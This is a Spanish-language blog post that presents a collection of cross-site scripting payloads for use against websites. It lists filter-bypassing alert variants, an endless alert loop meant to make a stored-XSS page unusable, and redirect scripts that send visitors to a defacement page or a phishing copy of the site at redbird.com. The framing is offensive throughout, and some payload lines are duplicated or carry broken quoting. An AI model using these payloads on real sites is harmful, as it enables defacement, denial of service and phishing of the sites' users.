Jugando con los Alert()
Ya en otras ocasiones hemos visto la función básica de la vulnerabilidad XSS, desde como se busca, identifica y explota utilizando un sencillo script o payload, con el fin de hacer que el sitio nos muestre una alerta. Para lograr eso, existe infinidad de payloads, que nos permiten vurlar los WAF, los filtros anti-XSS, etc.
Lo que conocemos normalmente es: <script>alert("XSS")</script>.
De este script, nacen mas con el fin de poder burlar filtros, saltarnos etiquetas html, etc. Por ejemplo tenemos estos:
<script>alert("XSS")</script>
"><script>alert('XSS')</script>
<script>alert("XSS")</script>
"><script>alert('XSS')</script>
'"><script>alert(/XSS/)</script>
"><b><script>alert(/xss/)</script></b>
<img src="x" onerror="alert(1)"">
'"><svg/onload=alert(/XSSPOSED/)>
Y un sin fin mas, de payloads. Sin embargo podemos jugar con los alert, aprovechándonos de la programación javascript y teniendo un poco de imaginacion (xD).
Por ejemplo, podemos utilizar un windows confirm.
<script>function redBIRD() { if (confirm("Selecciona OK")) { alert("RedBirdTeam"); }else { alert("No le diste al OK"); } redBIRD(); } redBIRD(); </script>
Jugando un poco, con una victima o con el XSS. Pero aun podemos ir mas lejos, podemos hacer que los alert, sean "infinitos":
"><script>for (;;) alert("Hacked by.Drok3r")</script>
Defacement & Phishing
Este tipo de script, suele dejar "fuera de servicio" una aplicacion web, que contiene un XSS almacenado, pero gracias a las a nuestros navegadores como lo son Firefox o Chrome, podemos evitar este tipo de ataques.
También podemos llegar a un Defacement con el XSS, sin embargo tiene sus ventajas y desventajas, una de ellas, es que si la vulnerabilidad es reflejada, solo afectara a quien acceda al enlace con el payload, pero si es un xss almacenado, si afecta a cualquiera que acceda a la pagina. Tanto podemos afectar al usuario con un Defacement, podemos redireccionarlo a un phishing del mismo sitio.
Para eso podemos utilizar ya sea que busquemos un defacement o redireccionar a un phishing:
<script> document.location.href = "http://redbird.com/deface.php"; </script>
<script> window.location= "http://redbird.com/deface.php"; </script>
<script> location.assign(""http://redbird.com/deface.php""); </script>
<script> location.replace("http://redbird.com/deface.php"); </script>
<script> window.location= "http://redbird.com/deface.php"; </script>
<script> location.assign(""http://redbird.com/deface.php""); </script>
<script> location.replace("http://redbird.com/deface.php"); </script>
EJEMPLO:
El ejemplo de arriba, redirecciona a una imagen que dice hacked.
No hay comentarios.:
Publicar un comentario